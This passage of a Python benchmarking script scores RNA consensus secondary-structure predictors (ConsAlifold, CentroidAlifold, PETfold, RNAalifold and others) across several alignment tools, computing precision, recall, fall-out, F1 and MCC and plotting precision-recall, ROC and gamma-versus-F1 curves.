        mafft_plus_consalifold_count_params = []
        clustalw_plus_consalifold_count_params = []
        mafft_xinsi_plus_consalifold_count_params = []
        ref_sa_plus_consalifold_count_params = []
        probcons_plus_consalifold_count_params = []
        mafft_plus_centroidalifold_count_params = []
        probcons_plus_centroidalifold_count_params = []
        clustalw_plus_centroidalifold_count_params = []
        mafft_xinsi_plus_centroidalifold_count_params = []
        ref_sa_plus_centroidalifold_count_params = []
        mafft_plus_petfold_count_params = []
        probcons_plus_petfold_count_params = []
        clustalw_plus_petfold_count_params = []
        mafft_xinsi_plus_petfold_count_params = []
        ref_sa_plus_petfold_count_params = []
        mafft_plus_rnaalifold_count_params = []
        probcons_plus_rnaalifold_count_params = []
        clustalw_plus_rnaalifold_count_params = []
        mafft_xinsi_plus_rnaalifold_count_params = []
        ref_sa_plus_rnaalifold_count_params = []
        centroidhomfold_count_params = []
        locarna_count_params = []
        raf_count_params = []
        turbofold_count_params = []
        gamma_str = str(gamma) if gamma < 1 else str(int(gamma))
        for rna_fam_file in os.listdir(rna_fam_dir_path):
            if not rna_fam_file.endswith(".fa"):
                continue
            rna_seq_file_path = os.path.join(rna_fam_dir_path, rna_fam_file)
            rna_seq_lens = [len(rna_seq.seq) for rna_seq in SeqIO.parse(rna_seq_file_path, "fasta")]
            num_of_rnas = len(rna_seq_lens)
            (rna_fam_name, extension) = os.path.splitext(rna_fam_file)
            ref_css_file_path = os.path.join(ref_sa_dir_path, rna_fam_name + ".sth")
            ref_css = utils.get_css(ref_css_file_path)
            mafft_plus_consalifold_estimated_css_dir_path = os.path.join(mafft_plus_consalifold_css_dir_path, rna_fam_name)
            probcons_plus_consalifold_estimated_css_dir_path = os.path.join(probcons_plus_consalifold_css_dir_path, rna_fam_name)
            clustalw_plus_consalifold_estimated_css_dir_path = os.path.join(clustalw_plus_consalifold_css_dir_path, rna_fam_name)
            mafft_xinsi_plus_consalifold_estimated_css_dir_path = os.path.join(mafft_xinsi_plus_consalifold_css_dir_path, rna_fam_name)
            ref_sa_plus_consalifold_estimated_css_dir_path = os.path.join(ref_sa_plus_consalifold_css_dir_path, rna_fam_name)
            mafft_plus_centroidalifold_estimated_css_dir_path = os.path.join(mafft_plus_centroidalifold_css_dir_path, rna_fam_name)
            probcons_plus_centroidalifold_estimated_css_dir_path = os.path.join(probcons_plus_centroidalifold_css_dir_path, rna_fam_name)
            clustalw_plus_centroidalifold_estimated_css_dir_path = os.path.join(clustalw_plus_centroidalifold_css_dir_path, rna_fam_name)
            mafft_xinsi_plus_centroidalifold_estimated_css_dir_path = os.path.join(mafft_xinsi_plus_centroidalifold_css_dir_path, rna_fam_name)
            ref_sa_plus_centroidalifold_estimated_css_dir_path = os.path.join(ref_sa_plus_centroidalifold_css_dir_path, rna_fam_name)
            mafft_plus_petfold_estimated_css_dir_path = os.path.join(mafft_plus_petfold_css_dir_path, rna_fam_name)
            probcons_plus_petfold_estimated_css_dir_path = os.path.join(probcons_plus_petfold_css_dir_path, rna_fam_name)
            clustalw_plus_petfold_estimated_css_dir_path = os.path.join(clustalw_plus_petfold_css_dir_path, rna_fam_name)
            mafft_xinsi_plus_petfold_estimated_css_dir_path = os.path.join(mafft_xinsi_plus_petfold_css_dir_path, rna_fam_name)
            ref_sa_plus_petfold_estimated_css_dir_path = os.path.join(ref_sa_plus_petfold_css_dir_path, rna_fam_name)
            centroidhomfold_estimated_ss_dir_path = os.path.join(centroidhomfold_ss_dir_path, rna_fam_name)
            turbofold_estimated_ss_dir_path = os.path.join(turbofold_ss_dir_path, rna_fam_name)
            mafft_plus_consalifold_estimated_css_file_path = os.path.join(mafft_plus_consalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(mafft_plus_consalifold_estimated_css_file_path)
            mafft_plus_consalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            probcons_plus_consalifold_estimated_css_file_path = os.path.join(probcons_plus_consalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(probcons_plus_consalifold_estimated_css_file_path)
            probcons_plus_consalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            clustalw_plus_consalifold_estimated_css_file_path = os.path.join(clustalw_plus_consalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(clustalw_plus_consalifold_estimated_css_file_path)
            clustalw_plus_consalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            mafft_xinsi_plus_consalifold_estimated_css_file_path = os.path.join(mafft_xinsi_plus_consalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(mafft_xinsi_plus_consalifold_estimated_css_file_path)
            mafft_xinsi_plus_consalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            ref_sa_plus_consalifold_estimated_css_file_path = os.path.join(ref_sa_plus_consalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(ref_sa_plus_consalifold_estimated_css_file_path)
            ref_sa_plus_consalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            mafft_plus_centroidalifold_estimated_css_file_path = os.path.join(mafft_plus_centroidalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(mafft_plus_centroidalifold_estimated_css_file_path)
            mafft_plus_centroidalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            probcons_plus_centroidalifold_estimated_css_file_path = os.path.join(probcons_plus_centroidalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(probcons_plus_centroidalifold_estimated_css_file_path)
            probcons_plus_centroidalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            clustalw_plus_centroidalifold_estimated_css_file_path = os.path.join(clustalw_plus_centroidalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(clustalw_plus_centroidalifold_estimated_css_file_path)
            clustalw_plus_centroidalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            mafft_xinsi_plus_centroidalifold_estimated_css_file_path = os.path.join(mafft_xinsi_plus_centroidalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(mafft_xinsi_plus_centroidalifold_estimated_css_file_path)
            mafft_xinsi_plus_centroidalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            ref_sa_plus_centroidalifold_estimated_css_file_path = os.path.join(ref_sa_plus_centroidalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(ref_sa_plus_centroidalifold_estimated_css_file_path)
            ref_sa_plus_centroidalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            mafft_plus_petfold_estimated_css_file_path = os.path.join(mafft_plus_petfold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(mafft_plus_petfold_estimated_css_file_path)
            mafft_plus_petfold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            probcons_plus_petfold_estimated_css_file_path = os.path.join(probcons_plus_petfold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(probcons_plus_petfold_estimated_css_file_path)
            probcons_plus_petfold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            clustalw_plus_petfold_estimated_css_file_path = os.path.join(clustalw_plus_petfold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(clustalw_plus_petfold_estimated_css_file_path)
            clustalw_plus_petfold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            mafft_xinsi_plus_petfold_estimated_css_file_path = os.path.join(mafft_xinsi_plus_petfold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(mafft_xinsi_plus_petfold_estimated_css_file_path)
            mafft_xinsi_plus_petfold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            ref_sa_plus_petfold_estimated_css_file_path = os.path.join(ref_sa_plus_petfold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
            estimated_css = utils.get_css(ref_sa_plus_petfold_estimated_css_file_path)
            ref_sa_plus_petfold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            centroidhomfold_estimated_ss_file_path = os.path.join(centroidhomfold_estimated_ss_dir_path, "gamma=" + gamma_str + ".fa")
            estimated_sss = get_sss(centroidhomfold_estimated_ss_file_path)
            centroidhomfold_count_params.insert(0, (rna_seq_lens, estimated_sss, ref_css))
            if gamma == 1.:
                mafft_plus_rnaalifold_estimated_css_file_path = os.path.join(mafft_plus_rnaalifold_css_dir_path, rna_fam_name + ".sth")
                estimated_css = utils.get_css(mafft_plus_rnaalifold_estimated_css_file_path)
                mafft_plus_rnaalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
                probcons_plus_rnaalifold_estimated_css_file_path = os.path.join(probcons_plus_rnaalifold_css_dir_path, rna_fam_name + ".sth")
                estimated_css = utils.get_css(probcons_plus_rnaalifold_estimated_css_file_path)
                probcons_plus_rnaalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
                clustalw_plus_rnaalifold_estimated_css_file_path = os.path.join(clustalw_plus_rnaalifold_css_dir_path, rna_fam_name + ".sth")
                estimated_css = utils.get_css(clustalw_plus_rnaalifold_estimated_css_file_path)
                clustalw_plus_rnaalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
                mafft_xinsi_plus_rnaalifold_estimated_css_file_path = os.path.join(mafft_xinsi_plus_rnaalifold_css_dir_path, rna_fam_name + ".sth")
                estimated_css = utils.get_css(mafft_xinsi_plus_rnaalifold_estimated_css_file_path)
                mafft_xinsi_plus_rnaalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
                ref_sa_plus_rnaalifold_estimated_css_file_path = os.path.join(ref_sa_plus_rnaalifold_css_dir_path, rna_fam_name + ".sth")
                estimated_css = utils.get_css(ref_sa_plus_rnaalifold_estimated_css_file_path)
                ref_sa_plus_rnaalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
                locarna_estimated_css_file_path = os.path.join(locarna_css_dir_path, rna_fam_name + "/results/result.stk")
                estimated_css = utils.get_css(locarna_estimated_css_file_path)
                locarna_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
                raf_estimated_css_file_path = os.path.join(raf_css_dir_path, rna_fam_name + ".sth")
                estimated_css = utils.get_css(raf_estimated_css_file_path)
                raf_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
            turbofold_estimated_ss_file_path = os.path.join(turbofold_estimated_ss_dir_path, "gamma=" + gamma_str + ".fa")
            estimated_sss = get_sss(turbofold_estimated_ss_file_path)
            turbofold_count_params.insert(0, (rna_seq_lens, estimated_sss, ref_css))
        results = pool.map(get_bin_counts, mafft_plus_consalifold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        mafft_plus_consalifold_ppvs.insert(0, ppv)
        mafft_plus_consalifold_senss.insert(0, sens)
        mafft_plus_consalifold_fprs.insert(0, fpr)
        mafft_plus_consalifold_f1_scores.append(f1_score)
        mafft_plus_consalifold_mccs.append(mcc)
        results = pool.map(get_bin_counts, probcons_plus_consalifold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        probcons_plus_consalifold_ppvs.insert(0, ppv)
        probcons_plus_consalifold_senss.insert(0, sens)
        probcons_plus_consalifold_fprs.insert(0, fpr)
        probcons_plus_consalifold_f1_scores.append(f1_score)
        probcons_plus_consalifold_mccs.append(mcc)
        results = pool.map(get_bin_counts, clustalw_plus_consalifold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        clustalw_plus_consalifold_ppvs.insert(0, ppv)
        clustalw_plus_consalifold_senss.insert(0, sens)
        clustalw_plus_consalifold_fprs.insert(0, fpr)
        clustalw_plus_consalifold_f1_scores.append(f1_score)
        clustalw_plus_consalifold_mccs.append(mcc)
        results = pool.map(get_bin_counts, mafft_xinsi_plus_consalifold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        mafft_xinsi_plus_consalifold_ppvs.insert(0, ppv)
        mafft_xinsi_plus_consalifold_senss.insert(0, sens)
        mafft_xinsi_plus_consalifold_fprs.insert(0, fpr)
        mafft_xinsi_plus_consalifold_f1_scores.append(f1_score)
        mafft_xinsi_plus_consalifold_mccs.append(mcc)
        results = pool.map(get_bin_counts, ref_sa_plus_consalifold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        ref_sa_plus_consalifold_ppvs.insert(0, ppv)
        ref_sa_plus_consalifold_senss.insert(0, sens)
        ref_sa_plus_consalifold_fprs.insert(0, fpr)
        ref_sa_plus_consalifold_f1_scores.append(f1_score)
        ref_sa_plus_consalifold_mccs.append(mcc)
        results = pool.map(get_bin_counts, mafft_plus_centroidalifold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        mafft_plus_centroidalifold_ppvs.insert(0, ppv)
        mafft_plus_centroidalifold_senss.insert(0, sens)
        mafft_plus_centroidalifold_fprs.insert(0, fpr)
        mafft_plus_centroidalifold_f1_scores.append(f1_score)
        mafft_plus_centroidalifold_mccs.append(mcc)
        results = pool.map(get_bin_counts, probcons_plus_centroidalifold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        probcons_plus_centroidalifold_ppvs.insert(0, ppv)
        probcons_plus_centroidalifold_senss.insert(0, sens)
        probcons_plus_centroidalifold_fprs.insert(0, fpr)
        probcons_plus_centroidalifold_f1_scores.append(f1_score)
        probcons_plus_centroidalifold_mccs.append(mcc)
        results = pool.map(get_bin_counts, clustalw_plus_centroidalifold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        clustalw_plus_centroidalifold_ppvs.insert(0, ppv)
        clustalw_plus_centroidalifold_senss.insert(0, sens)
        clustalw_plus_centroidalifold_fprs.insert(0, fpr)
        clustalw_plus_centroidalifold_f1_scores.append(f1_score)
        clustalw_plus_centroidalifold_mccs.append(mcc)
        results = pool.map(get_bin_counts, mafft_xinsi_plus_centroidalifold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        mafft_xinsi_plus_centroidalifold_ppvs.insert(0, ppv)
        mafft_xinsi_plus_centroidalifold_senss.insert(0, sens)
        mafft_xinsi_plus_centroidalifold_fprs.insert(0, fpr)
        mafft_xinsi_plus_centroidalifold_f1_scores.append(f1_score)
        mafft_xinsi_plus_centroidalifold_mccs.append(mcc)
        results = pool.map(get_bin_counts, ref_sa_plus_centroidalifold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        ref_sa_plus_centroidalifold_ppvs.insert(0, ppv)
        ref_sa_plus_centroidalifold_senss.insert(0, sens)
        ref_sa_plus_centroidalifold_fprs.insert(0, fpr)
        ref_sa_plus_centroidalifold_f1_scores.append(f1_score)
        ref_sa_plus_centroidalifold_mccs.append(mcc)
        results = pool.map(get_bin_counts, mafft_plus_petfold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        mafft_plus_petfold_ppvs.insert(0, ppv)
        mafft_plus_petfold_senss.insert(0, sens)
        mafft_plus_petfold_fprs.insert(0, fpr)
        mafft_plus_petfold_f1_scores.append(f1_score)
        mafft_plus_petfold_mccs.append(mcc)
        results = pool.map(get_bin_counts, probcons_plus_petfold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        probcons_plus_petfold_ppvs.insert(0, ppv)
        probcons_plus_petfold_senss.insert(0, sens)
        probcons_plus_petfold_fprs.insert(0, fpr)
        probcons_plus_petfold_f1_scores.append(f1_score)
        probcons_plus_petfold_mccs.append(mcc)
        results = pool.map(get_bin_counts, clustalw_plus_petfold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        clustalw_plus_petfold_ppvs.insert(0, ppv)
        clustalw_plus_petfold_senss.insert(0, sens)
        clustalw_plus_petfold_fprs.insert(0, fpr)
        clustalw_plus_petfold_f1_scores.append(f1_score)
        clustalw_plus_petfold_mccs.append(mcc)
        results = pool.map(get_bin_counts, mafft_xinsi_plus_petfold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        mafft_xinsi_plus_petfold_ppvs.insert(0, ppv)
        mafft_xinsi_plus_petfold_senss.insert(0, sens)
        mafft_xinsi_plus_petfold_fprs.insert(0, fpr)
        mafft_xinsi_plus_petfold_f1_scores.append(f1_score)
        mafft_xinsi_plus_petfold_mccs.append(mcc)
        results = pool.map(get_bin_counts, ref_sa_plus_petfold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        ref_sa_plus_petfold_ppvs.insert(0, ppv)
        ref_sa_plus_petfold_senss.insert(0, sens)
        ref_sa_plus_petfold_fprs.insert(0, fpr)
        ref_sa_plus_petfold_f1_scores.append(f1_score)
        ref_sa_plus_petfold_mccs.append(mcc)
        results = pool.map(get_bin_counts, centroidhomfold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        centroidhomfold_ppvs.insert(0, ppv)
        centroidhomfold_senss.insert(0, sens)
        centroidhomfold_fprs.insert(0, fpr)
        centroidhomfold_f1_scores.append(f1_score)
        centroidhomfold_mccs.append(mcc)
        if gamma == 1.:
            results = pool.map(get_bin_counts, mafft_plus_rnaalifold_count_params)
            mafft_plus_rnaalifold_ppv, mafft_plus_rnaalifold_sens, mafft_plus_rnaalifold_fpr, mafft_plus_rnaalifold_f1_score, mafft_plus_rnaalifold_mcc = get_metrics(final_sum(results))
            results = pool.map(get_bin_counts, probcons_plus_rnaalifold_count_params)
            probcons_plus_rnaalifold_ppv, probcons_plus_rnaalifold_sens, probcons_plus_rnaalifold_fpr, probcons_plus_rnaalifold_f1_score, probcons_plus_rnaalifold_mcc = get_metrics(final_sum(results))
            results = pool.map(get_bin_counts, clustalw_plus_rnaalifold_count_params)
            clustalw_plus_rnaalifold_ppv, clustalw_plus_rnaalifold_sens, clustalw_plus_rnaalifold_fpr, clustalw_plus_rnaalifold_f1_score, clustalw_plus_rnaalifold_mcc = get_metrics(final_sum(results))
            results = pool.map(get_bin_counts, mafft_xinsi_plus_rnaalifold_count_params)
            mafft_xinsi_plus_rnaalifold_ppv, mafft_xinsi_plus_rnaalifold_sens, mafft_xinsi_plus_rnaalifold_fpr, mafft_xinsi_plus_rnaalifold_f1_score, mafft_xinsi_plus_rnaalifold_mcc = get_metrics(final_sum(results))
            results = pool.map(get_bin_counts, ref_sa_plus_rnaalifold_count_params)
            ref_sa_plus_rnaalifold_ppv, ref_sa_plus_rnaalifold_sens, ref_sa_plus_rnaalifold_fpr, ref_sa_plus_rnaalifold_f1_score, ref_sa_plus_rnaalifold_mcc = get_metrics(final_sum(results))
            results = pool.map(get_bin_counts, locarna_count_params)
            locarna_ppv, locarna_sens, locarna_fpr, locarna_f1_score, locarna_mcc = get_metrics(final_sum(results))
            results = pool.map(get_bin_counts, raf_count_params)
            raf_ppv, raf_sens, raf_fpr, raf_f1_score, raf_mcc = get_metrics(final_sum(results))
        results = pool.map(get_bin_counts, turbofold_count_params)
        ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
        turbofold_ppvs.insert(0, ppv)
        turbofold_senss.insert(0, sens)
        turbofold_fprs.insert(0, fpr)
        turbofold_f1_scores.append(f1_score)
        turbofold_mccs.append(mcc)
# Precision-recall curves; figure for ProbCons.
pyplot.figure()
line_1, = pyplot.plot(probcons_plus_consalifold_ppvs, probcons_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(probcons_plus_centroidalifold_ppvs, probcons_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(probcons_plus_petfold_ppvs, probcons_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(probcons_plus_rnaalifold_ppv, probcons_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
pyplot.legend(handles = [line_1, line_2, line_3, line_4], loc = "lower left")
image_dir_path = asset_dir_path + "/images"
if not os.path.exists(image_dir_path):
    os.mkdir(image_dir_path)
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_css_estimation_probcons.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT.
pyplot.figure()
line_1, = pyplot.plot(mafft_plus_consalifold_ppvs, mafft_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(mafft_plus_centroidalifold_ppvs, mafft_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(mafft_plus_petfold_ppvs, mafft_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(mafft_plus_rnaalifold_ppv, mafft_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
pyplot.legend(handles = [line_1, line_2, line_3, line_4], loc = "lower left")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_css_estimation_mafft.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ClustalW.
pyplot.figure()
line_1, = pyplot.plot(clustalw_plus_consalifold_ppvs, clustalw_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(clustalw_plus_centroidalifold_ppvs, clustalw_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(clustalw_plus_petfold_ppvs, clustalw_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(clustalw_plus_rnaalifold_ppv, clustalw_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
pyplot.legend(handles = [line_1, line_2, line_3, line_4], loc = "lower left")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_css_estimation_clustalw.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT X-INS-i.
pyplot.figure()
line_1, = pyplot.plot(mafft_xinsi_plus_consalifold_ppvs, mafft_xinsi_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(mafft_xinsi_plus_centroidalifold_ppvs, mafft_xinsi_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(mafft_xinsi_plus_petfold_ppvs, mafft_xinsi_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(mafft_xinsi_plus_rnaalifold_ppv, mafft_xinsi_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
pyplot.legend(handles = [line_1, line_2, line_3, line_4], loc = "lower left")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_css_estimation_mafft_xinsi.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for reference sequence alignments.
pyplot.figure()
line_1, = pyplot.plot(ref_sa_plus_consalifold_ppvs, ref_sa_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(ref_sa_plus_centroidalifold_ppvs, ref_sa_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(ref_sa_plus_petfold_ppvs, ref_sa_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(ref_sa_plus_rnaalifold_ppv, ref_sa_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
pyplot.legend(handles = [line_1, line_2, line_3, line_4], loc = "lower left")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_css_estimation_ref_sa.eps", bbox_inches = "tight")
pyplot.clf()
# ROC curves; figure for ProbCons.
pyplot.figure()
line_1, = pyplot.plot(probcons_plus_consalifold_fprs, probcons_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(probcons_plus_centroidalifold_fprs, probcons_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(probcons_plus_petfold_fprs, probcons_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(probcons_plus_rnaalifold_fpr, probcons_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_css_estimation_probcons.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT.
pyplot.figure()
line_1, = pyplot.plot(mafft_plus_consalifold_fprs, mafft_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(mafft_plus_centroidalifold_fprs, mafft_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(mafft_plus_petfold_fprs, mafft_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(mafft_plus_rnaalifold_fpr, mafft_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_css_estimation_mafft.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ClustalW.
pyplot.figure()
line_1, = pyplot.plot(clustalw_plus_consalifold_fprs, clustalw_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(clustalw_plus_centroidalifold_fprs, clustalw_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(clustalw_plus_petfold_fprs, clustalw_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(clustalw_plus_rnaalifold_fpr, clustalw_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_css_estimation_clustalw.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT X-INS-i.
pyplot.figure()
line_1, = pyplot.plot(mafft_xinsi_plus_consalifold_fprs, mafft_xinsi_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(mafft_xinsi_plus_centroidalifold_fprs, mafft_xinsi_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(mafft_xinsi_plus_petfold_fprs, mafft_xinsi_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(mafft_xinsi_plus_rnaalifold_fpr, mafft_xinsi_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_css_estimation_mafft_xinsi.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for reference sequence alignments.
pyplot.figure()
line_1, = pyplot.plot(ref_sa_plus_consalifold_fprs, ref_sa_plus_consalifold_senss, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(ref_sa_plus_centroidalifold_fprs, ref_sa_plus_centroidalifold_senss, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(ref_sa_plus_petfold_fprs, ref_sa_plus_petfold_senss, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(ref_sa_plus_rnaalifold_fpr, ref_sa_plus_rnaalifold_sens, label = "RNAalifold", marker = "v", linestyle = ":")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_css_estimation_ref_sa.eps", bbox_inches = "tight")
pyplot.clf()
# Gamma versus F1 score; figure for ProbCons.
gammas = list(range(min_gamma, max_gamma + 1))
pyplot.figure()
line_1, = pyplot.plot(gammas, probcons_plus_consalifold_f1_scores, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, probcons_plus_centroidalifold_f1_scores, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, probcons_plus_petfold_f1_scores, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., probcons_plus_rnaalifold_f1_score, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_consalifold_f1_scores), max(probcons_plus_consalifold_f1_scores), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
